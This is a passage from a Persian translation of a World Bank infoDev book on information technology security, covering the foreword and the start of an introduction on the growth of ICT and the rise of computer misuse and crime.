‫ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻨﺠﺎ ﺑﺮ ﺧﻮﺩ ﻻﺯﻡ ﻣﻲﺩﺍﻧﻴﻢ ﻛﻪ ﻣﺮﺍﺗﺐ ﺗﺸﻜﺮ ﻭ ﺍﻣﺘﻨﺎﻥ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺩﻟﻴﻞ ﺑﺬﻝ ﺗﻮﺟﻪ ﺩﺑﻴﺮﺧﺎﻧـﺔ ﺍﻳـﺎﻟﺘﻲ ﺍﻣـﻮﺭ ﺍﻗﺘـﺼﺎﺩﻱ ﺳـﻮﺋﻴﺲ‬
‫)‪ ٤(SECO‬ﻧﻪﺗﻨﻬﺎ ﺑﺨﺎﻃﺮ ﺗﺄﻣﻴﻦ ﺍﻋﺘﺒﺎﺭ ﺍﻳﻦ ﭘﺮﻭﮊﻩ‪ ،‬ﺑﻠﻜﻪ ﺑﺨﺎﻃﺮ ﺩﺭﻙ ﻓﻮﺭﻳﺖ ﻣﺴﺌﻠﻪ ﻭ ﺑﻪ ﺛﻤﺮ ﺭﺳﺎﻧﺪﻥ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﻋﻼﻡ ﻧﻤﺎﺋﻴﻢ‪.‬‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ )‪ ٥(ICT‬ﻧﻘﺶ ﻣﻬﻤﻲ ﺩﺭ ﺗﻮﺳﻌﺔ ﺍﻗﺘﺼﺎﺩﻱ ﻭ ﺍﺟﺘﻤﺎﻋﻲ ﺍﻳﻔﺎ ﻣﻲﻛﻨﺪ‪ ،‬ﻭﻟﻲ ﺍﻳﻦ ﻧﻜﺘﻪ ﺭﺍ ﻧﻴﺰ ﻧﺒﺎﻳﺪ ﺍﺯ ﻧﻈـﺮ‬
‫ﺩﻭﺭ ﺩﺍﺷﺖ ﻛﻪ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻧﺎﺍﻣﻦ ﻭ ﻏﻴﺮ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ‪ ،‬ﺍﺳﺘﻔﺎﺩﺓ ﻣﺆﺛﺮ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻧﺎﺷﺪﻧﻲ ﺍﺳﺖ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺍﻣﻨﻴـﺖ‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺍﺭﺍﻱ ﻧﻘﺸﻲ ﺍﺳﺎﺳﻲ ﻭ ﺗﻌﻴﻴﻦﻛﻨﻨﺪﻩ ﺩﺭ ﺍﻳﺠﺎﺩ ﺷﺮﺍﻳﻂ ﻻﺯﻡ ﺑﺮﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﻮﻓﻖ ﻃﺮﺡﻫﺎﻱ ﻣﻠﻲ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ‪ ،‬ﺩﻭﻟﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﻭ ﺍﺟﺮﺍﻱ ﭘﺮﻭﮊﻩﻫﺎﻳﻲ ﺩﺭ ﺯﻣﻴﻨﻪﻫـﺎﻱ ﺁﻣـﻮﺯﺵ ﻭ ﭘـﺮﻭﺭﺵ‪ ،‬ﺑﻬﺪﺍﺷـﺖ ﻳـﺎ ﺍﻣـﻮﺭ ﻣـﺎﻟﻲ ﻭ‬
‫ﺍﻋﺘﺒﺎﺭﻱ ﺍﺳﺖ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺿﻮﻉ ﭘﻴﭽﻴﺪﻩﺍﻱ ﺍﺳﺖ ﻭ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﮕﺎﻡ ﺑﺎ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺣﺎﻝ ﺗﻜﻮﻳﻦ ﺍﺳﺖ‪ .‬ﻣﺆﻟﻔﻴﻦ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺗﻮﺍﻧﺴﺘﻪ‪-‬‬
‫ﺍﻧﺪ ﺑﻬﺘﺮﻳﻦ ﺭﺍﻫﻜﺎﺭﻫﺎ ﻭ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺭﺍ ‪ -‬ﻣﺴﺘﻘﻞ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ‪ -‬ﺑﺮﺍﻱ ﻣﺤﻴﻂﻫﺎﻱ ﻭﻳﮋﺓ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﺭﺍﺋﻪ ﺩﻫﻨﺪ‪ .‬ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻫﻤﭽﻨـﻴﻦ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻣﺮﺍﺟﻌﻪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ‪ www.infodev-security.net‬ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺑﻪﺭﻭﺯ ﻭ ﻣﻨﺎﺳﺐ ﺩﺳﺖ ﻳﺎﺑﻨـﺪ ﻭ ﺍﺯ ﻃﺮﻳـﻖ ﺍﻳـﻦ ﺟﺮﻳـﺎﻥ‬
‫ﻲ ﺛﺎﺑــﺖ‪ ،‬ﺍﺯ ﭘﻴــﺸﺮﻓﺖﻫــﺎﻱ ﺟﺪﻳــﺪ ﺩﺭ ﺯﻣﻴﻨــﺔ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﺑــﺎﺧﺒﺮ ﺷــﻮﻧﺪ‪ .‬ﺑــﺎ ﺗﻮﺟــﻪ ﺑــﻪ ﺍﻳﻨﻜــﻪ ﻣﻄﺎﻟــﺐ‬
‫ﺍﻃــﻼﻉﺭﺳــﺎﻧ ﹺ‬
‫ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﻟﺰﻭﻣﹰﺎ ﺩﻳﺪﮔﺎﻩﻫﺎﻱ ‪ infoDev‬ﻳﺎ ﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﺭﺍ ﻣﻨﻌﻜﺲ ﻧﻤﻲﻛﻨﺪ‪ ،‬ﺑﻨﻈﺮ ﻣﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺩﺭ ﻛﻨـﺎﺭ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﻛﻤﻚ ﺑﺰﺭﮔﻲ ﺑﻪ ﻓﻬﻢ ﻣﻮﺿﻮﻋﺎﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﻛﺘﺎﺏ ﺣﺎﺿﺮ ﻣﺘﺸﻜﻞ ﺍﺯ ﭘﻨﺞ ﺑﺨﺶ ﺍﺳﺖ ﻛﻪ ﻫﺮﻳﻚ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺼﻮﺭﺕ ﺟﺪﺍﮔﺎﻧﻪ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﮔﻴـﺮﺩ‪ .‬ﭘـﺲ ﺍﺯ ﻣﻘﺪﻣـﻪﺍﻱ‬
‫ﻛﻮﺗﺎﻩ ﺑﺮ ﻋﻨﺎﻭﻳﻦ ﻋﻤﻮﻣﻲ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺑﻪ ﻣﻄﺎﻟﺐ ﻭ ﻣﺒﺎﺣﺜﻲ ﺑﺮﺧﻮﺭﺩ ﺧﻮﺍﻫﻴﺪﻛﺮﺩ ﻛﻪ ﺑـﺮﺍﻱ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﻧﻔـﺮﺍﺩﻱ‪ ،‬ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ‪ ،‬ﺩﻭﻟﺖ‪ ،‬ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ ﻣﻨﺎﺳﺐ ﻫﺴﺘﻨﺪ‪ .‬ﻫﺮﭼﻨـﺪ ﺑﻴـﺸﺘﺮ ﭘﮋﻭﻫـﺸﻬﺎ ﻭ ﻣﻘـﺎﻻﺕ ﻣﻨﺘـﺸﺮ ﺷـﺪﻩ ﺩﺭﺑـﺎﺭﺓ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﭘﻴﺪﺍ ﻣﻲﺷﻮﺩ‪ ،‬ﻭﻟﻲ ﺗﻼﺵ ﻣﺆﻟﻔﻴﻦ ﺑﺮ ﺍﻳﻦ ﺑﻮﺩﻩ ﻛﻪ ﺧﻂﻣﺸﻲﻫﺎﻱ ﻋﻤﻠﻲ ﻭ ﻛﺎﺭﺁﻣﺪﻱ ﺍﺭﺍﺋﻪ ﺩﻫﻨـﺪ ﻛـﻪ‬
‫ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻧﻴﺰ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻣﻴﺪﻭﺍﺭﻳﻢ ﺍﻧﺘﺸﺎﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﻭ ﺁﻏﺎﺯ ﺑﻜﺎﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺁﻥ ﻧﻘﻄﺔ ﺁﻏﺎﺯ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﺗﻌـﺎﻣﻠﻲ ﺍﺯ ﭘﻴـﺸﺮﻓﺖ ﻫﻤﺰﻣـﺎﻥ ﺭﺍﻫﻜﺎﺭﻫـﺎ ﻭ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺑﺎﺷﺪ؛ ﻭ ﺩﺭ ﺍﻳﻦ ﺭﺍﻩ ﺁﻧﭽﻪ ﺑﻴﺶ ﺍﺯ ﻫﻤﻪ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻣﺤﺘﺮﻡ ﻛﺘﺎﺏ‪ ،‬ﺷﻴﻮﻩ ﻭ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﻣﻨﺎﺳﺐ ﻭ ﻛﺎﺭﺁﻣﺪ ﺧﻮﺩ ﺭﺍ‬
‫ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺰ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬
‫‪Mohesn A. Khalil‬‬
‫‪Burno Lanvin‬‬
‫‪Michel A.Maechler‬‬
‫‪ :‬ﻣﺪﻳﺮ ﺑﺨﺶ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ‪ -‬ﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ‬
‫‪ :‬ﻣﺪﻳﺮ ﺑﺮﻧﺎﻣﺔ ‪ - infoDev‬ﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ‬
‫‪ :‬ﻣﺪﻳﺮ ﺗﻘﺴﻴﻢ ﻭﻇﺎﻳﻒ ﮔﺴﺘﺮﺵ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻛﺎﺭﺷﻨﺎﺱ ﺍﺭﺷﺪ ﺍﻧﻔﻮﺭﻣﺎﺗﻴﻚ ‪ -‬ﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ‬
‫‪infoDev Program of the World Bank Group‬‬
‫‪IT Security‬‬
‫‪infoDev Technical Advisory Panel‬‬
‫‪State Secretariat of Economic Affairs of Switzerland‬‬
‫‪Information & Communication Technology‬‬
‫‪1‬‬
‫‪2‬‬
‫‪3‬‬
‫‪4‬‬
‫‪5‬‬
‫ﭘﻴﺶﺩﺭﺁﻣﺪ‬
‫ﺳـﻴﺮ ﭘﻴـﺸﺮﻓﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭ ﻧﻮﺁﻭﺭﻳﻬــﺎﻱ‬
‫ﺣﺎﺻﻞ ﺍﺯ ﺁﻥ ﻣﻮﺟﺐ ﺍﻓﺰﺍﻳﺶ ﭼـﺸﻤﮕﻴﺮ ﺑﻬـﺮﻩﻭﺭﻱ ﻭ ﭘﻴـﺪﺍﻳﺶ‬
‫ﺍﻧــﻮﺍﻉ ﺟﺪﻳــﺪﻱ ﺍﺯ ﻛﺎﻻﻫــﺎ ﻭ ﺧــﺪﻣﺎﺕ ﺷــﺪﻩ ﺍﺳــﺖ‪ .‬ﺑــﺎ ﺑﻬﺒــﻮﺩ‬
‫ﺭﻭﺯﺍﻓﺰﻭﻥ ﻗﺪﺭﺕ‪ ،‬ﻇﺮﻓﻴﺖ ﻭ ﻗﻴﻤﺖ ﺗﺠﻬﻴﺰﺍﺕ ﻣﻴﻜﺮﻭﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﻛﻪ ﺑﻪ ﺭﺷﺪ ﺳﺎﻻﻧﺔ ﺗﻘﺮﻳﺒﹰﺎ ‪ ۳۰‬ﺩﺭﺻـﺪﻱ ﺑﻬـﺮﻩﻭﺭﻱ ﻧـﺴﺒﺖ ﺑـﻪ‬
‫ﻗﻴﻤﺖ ﻣﻨﺠﺮ ﺷﺪﻩ‪ ،‬ﺍﻣﻜﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﻓﻨـﺎﻭﺭﻱ ﺑـﺮﺍﻱ ﻫﻤـﻪ‬
‫ﻣﻴﺴﺮ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻣﺮﻭﺯﻩ ﻣﺎ ﺩﺭ ﺩﻧﻴـﺎﻳﻲ ﺯﻧـﺪﮔﻲ ﻣـﻲﻛﻨـﻴﻢ ﻛـﻪ‬
‫ﭘﺮﺩﺍﺯﺵ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺁﻥ ﺍﺭﺯﺍﻥ ﻭ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺍﺭﺗﺒـﺎﻁ ﺗﻠﻔﻨـﻲ ﺭﻭ‬
‫ﺑﻪ ﻛﺎﻫﺶ ﺍﺳﺖ ﻭ ﺟﻬﺎﻥ ﺑﻄﻮﺭ ﻓﺰﺍﻳﻨـﺪﻩﺍﻱ ﺩﺭ ﺗﺒـﺎﺩﻝ ﻭ ﺗﻌﺎﻣـﻞ‬
‫ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺍﻣﺎ ﻓﺮﺍﻫﻢ ﺷـﺪﻥ ﺍﻣﻜﺎﻧـﺎﺕ ﻓﻨـﻲ ﺟﺪﻳـﺪ ﺗﻨﻬـﺎ ﺑﺎﻋـﺚ ﭘﻴـﺪﺍﻳﺶ‬
‫ﻣﺤﺼﻮﻻﺕ ﻧﻮﻳﻦ ﻭ ﺭﺍﻫﻬﺎﻱ ﺑﻬﺘﺮ ﻭ ﻛﺎﺭﺁﻣﺪﺗﺮ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻣـﻮﺭ‬
‫ﻧﺸﺪﻩ‪ ،‬ﺑﻠﻜﻪ ﺩﺭ ﻛﻨﺎﺭ ﺁﻥ ﺍﻣﻜﺎﻥ ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺭﺍ ﻧﻴـﺰ‬
‫ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩﻩ ﺍﺳﺖ‪ .‬ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻧﻴـﺰ ﻫﻤﺎﻧﻨـﺪ‬
‫ﺳﺎﻳﺮ ﻓﻨﺎﻭﺭﻳﻬﺎ ﺣﺎﻟﺖ ﺍﺑﺰﺍﺭﻱ ﺩﺍﺭﺩ ﻭ ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﮕﻮﻧﻪﺍﻱ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺩ ﻛﻪ ﺑﺮﺍﻱ ﻫﻤﮕﺎﻥ ﻣﻔﻴﺪ ﺑﺎﺷﺪ ﻭ ﻳﺎ ﺑﻪ ﻧﺤـﻮﻱ ﺍﺯ‬
‫ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ ﻛﻪ ﻧﺘﺎﻳﺞ ﺧﻄﺮﻧﺎﻛﻲ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ‪ .‬ﻋﺎﻣﻞ ﺳـﺮﻋﺖ‬
‫ﺩﺭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﭼﻴﺰﻱ ﺩﺭ ﺣـﺪﻭﺩ ﻣﻴﻜﺮﻭﺛﺎﻧﻴـﻪ‬
‫ﺍﺳﺖ ﻛﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺍﻃﻼﻋﺎﺕ ﻏﻴﺮﻗﺎﺑﻞ ﻣـﺸﺎﻫﺪﻩ ﺑـﺎ ﭼـﺸﻢ‬
‫ﻏﻴﺮﻣﺴﻠﺢ‪ ،‬ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﻬﻴﻪﺷﺪﻩ ﺗﻮﺳﻂ ﺍﻓـﺮﺍﺩ ﺟﺎﺑﺠـﺎ‬
‫ﮔﺮﺩﺩ‪ .‬ﺩﺭ ﭼﻨﻴﻦ ﻓﻀﺎﻳﻲ ﺍﻋﻤﺎﻝ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻭ ﻣﺨﺮﺏ ﺁﻧﻘﺪﺭ ﺳﺮﻳﻊ‬
‫ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻏﻴﺮﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺎﺷﺪ ‪ -‬ﻫﺮﭼﻨﺪ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺁﻥ ﻏﻴﺮ ﻣﻤﻜﻦ ﻧﻴﺴﺖ‪.‬‬
‫ﻣﺸﻜﻼﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ‪ ،‬ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ‬
‫ﻭﺍﺑــﺴﺘﻪ ﺑــﻪ ﺁﻧﻬــﺎ ﻭ ﺫﺧﻴــﺮﻩ ﻭ ﺍﺭﺳــﺎﻝ ﺍﻃﻼﻋــﺎﺕ ﺑــﻪ ﺷــﻜﻞ‬
‫ﻱ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﻣــﺴﺎﺋﻞ ﺗــﺎﺯﻩﺍﻱ ﻧﻴــﺴﺘﻨﺪ‪ .‬ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺗﺠــﺎﺭ ﹺ‬
‫ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻧﺰﺩﻳﻚ ﺑﻪ ﭘﻨﺠـﺎﻩ ﺳـﺎﻝ ﻗـﺪﻣﺖ ﺩﺍﺭﻧـﺪ‪ .‬ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺑﺎﻧﻜﺪﺍﺭﻱ ﻧﻴﺰ ﺍﻧﺘﻘﺎﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭘﻮﻝ ﺭﺍ ﺗﻘﺮﻳﺒﹰﺎ ﺩﺭ ﻫﻤﺎﻥ ﺯﻣـﺎﻥ‬
‫ﺁﻏﺎﺯ ﻛﺮﺩﻩﺍﻧﺪ‪.‬‬
‫ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺠﺎﺭﻱ‪ ،‬ﺑﺮﺍﻱ ﺍﺭﺗﻜﺎﺏ ﺟﺮﻡ ﺍﺯ ﻃﺮﻳﻖ ﻧﻔـﻮﺫ‬
‫ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺎﻟﻲ ﺍﻧﮕﻴـﺰﻩﻫـﺎﻱ ﻗـﻮﻱ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺩﺭ ﻭﺍﻛﻨﺶ ﺑﻪ ﺍﻓـﺰﺍﻳﺶ ﺍﺣﺘﻤـﺎﻝ ﺍﻧﺠـﺎﻡ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ‬
‫ﺗﺒﻬﻜﺎﺭﺍﻧﻪ ﻭ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻗـﻮﻱﺗـﺮ ﺩﺭ ﻋﺮﺻـﺔ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﭘﺮﺩﺍﺯﺵ‪ ،‬ﻃﺮﺣﻬﺎﻱ ﺗﺤﻘﻴﻘﺎﺕ ﻭ ﺗﻮﺳﻌﻪﺍﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺁﻏﺎﺯ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﻧﻴﻢﻗﺮﻥ ﺍﺧﻴﺮ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﺴﺎﺋﻞ ﺗﻐﻴﻴـﺮ ﻛـﺮﺩﻩﺍﻧـﺪ‪ .‬ﺍﻧﻘـﻼﺏ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻛﻪ ﺩﺭ ﺍﻭﺍﺳﻂ ﺩﻫﺔ ‪ ۷۰‬ﻣﻴﻼﺩﻱ ﺷﺮﻭﻉ ﺷـﺪ‬
‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻣﻮﺟﺐ ﺷﺪﻩ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﺑﺎ ﺍﻧﺪﺍﺯﻩ ﻭ ﻗـﺪﺭﺗﻲ ﻗﺎﺑـﻞ‬
‫ﻣﻼﺣﻈﻪ ﺩﺭ ﺩﺳﺘﺮﺱ ﺻﺪﻫﺎ ﻣﻴﻠﻴـﻮﻥ ﻧﻔـﺮ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪.‬‬
‫ﻋﻼﻭﻩ ﺑـﺮ ﺁﻥ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺩﻳﮕـﺮ ﺍﻧـﻮﺍﻉ ﺷـﺒﻜﻪﻫـﺎﻱ ﺷﺨـﺼﻲ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻴﻦ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺭﺍ ﻣﻴـﺎﻥ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﺮﺩﻡ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ‬
‫ﺳﺎﺧﺘﻪﺍﻧﺪ‪ .‬ﺑﻴﺴﺖ ﻭ ﭘﻨﺞ ﺳﺎﻝ ﭘﻴﺶ ﻛـﺎﺭ ﺑـﺎ ﺭﺍﻳﺎﻧـﻪ ﻭ ﺑﺮﻗـﺮﺍﺭﻱ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﻋﻤﻮﻣﹰﺎ ﺗﻮﺳﻂ ﺗﻌﺪﺍﺩ ﻛﻤﻲ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳـﺎﻥ ﺍﻳـﻦ ﺭﺷـﺘﻪ‬
‫ﺻﻮﺭﺕ ﻣﻲ ﭘﺬﻳﺮﻓﺖ؛ ﺍﻣﺎ ﺍﻣـﺮﻭﺯﻩ ﺻـﺪﻫﺎ ﻣﻴﻠﻴـﻮﻥ ﺭﺍﻳﺎﻧـﻪ ﺑـﺮﺍﻱ‬
‫ﭘﺮﺩﺍﺯﺵ ﻫﺮﮔﻮﻧﻪ ﺍﻃﻼﻋﺎﺕ ﻗﺎﺑﻞ ﺗﺼﻮﺭﻱ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﻭ ﺗﻮﺳﻂ‬
‫ﻳﻚ ﺷﺒﻜﺔ ﺍﺭﺗﺒﺎﻃﻲ ﻗﻮﻱ ﺑﻨﺎﻡ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﻫﻢ ﻣﺘﺼﻞ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺍﻳﻦ ﺷﺒﻜﻪ ﻣﻮﺟﺐ ﮔﺴﺘﺮﺵ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺮﺩﻣﻲ ﺍﺯ ﻃﺮﻳـﻖ ﭘـﺴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﺷﺪﻩ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻣﻜﺎﻥ‬
‫ﺩﺳﺘﺮﺳﻲ ﺁﺳﺎﻥ ﻭ ﻧﺴﺒﺘﹰﺎ ﺍﺭﺯﺍﻥ ﺑـﻪ ﻣﻔـﺎﻫﻴﻢ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻭ ﺍﺳـﻨﺎﺩ‬
‫ﺗﺠﻬﻴﺰﺍﺕ ﻓﻨﻲ ﻭ ﻣﺤﺼﻮﻻﺕ ﺩﺭﺣـﺎﻝ ﺳـﺎﺧﺖ ﺭﺍ ﺑﻮﺟـﻮﺩ ﺁﻭﺭﺩﻩ‬
‫ﺍﺳﺖ‪ .‬ﺑﺪﻳﻬﻲ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺗﻨﺎﺳﺐ ﭘﻴﺸﺮﻓﺖ ﻓﻨﺎﻭﺭﻱ‪ ،‬ﻣـﺸﻜﻼﺕ‬
‫ﻧﻴﺰ ﺑﻴﺸﺘﺮ ﻣﻲﺷﻮﺩ‪ .‬ﻋﻤﺪﺓ ﻛﺎﺭﺑﺮﺍﻥ ﺷﺒﻜﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﻫﺔ ‪۷۰‬‬
‫ﻣﻴﻼﺩﻱ ﺭﺍ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﺣﺮﻓﻪﺍﻱ ﺭﺍﻳﺎﻧﻪ ﺗﺸﻜﻴﻞ ﻣﻲﺩﺍﺩﻧـﺪ؛ ﺣـﺎﻝ‬
‫ﺁﻧﻜﻪ ﺍﻣﺮﻭﺯ ﺑﻴﺸﺘﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ ﺍﻓﺮﺍﺩ ﻏﻴﺮﺣﺮﻓـﻪﺍﻱ ﻫـﺴﺘﻨﺪ ﻭ ﻟـﺬﺍ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﺪﻡ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﻓﻲ ﺁﻧـﺎﻥ ﺑﺎﻋـﺚ ﺷـﻮﺩ ﻛـﻪ ﺍﺯ‬
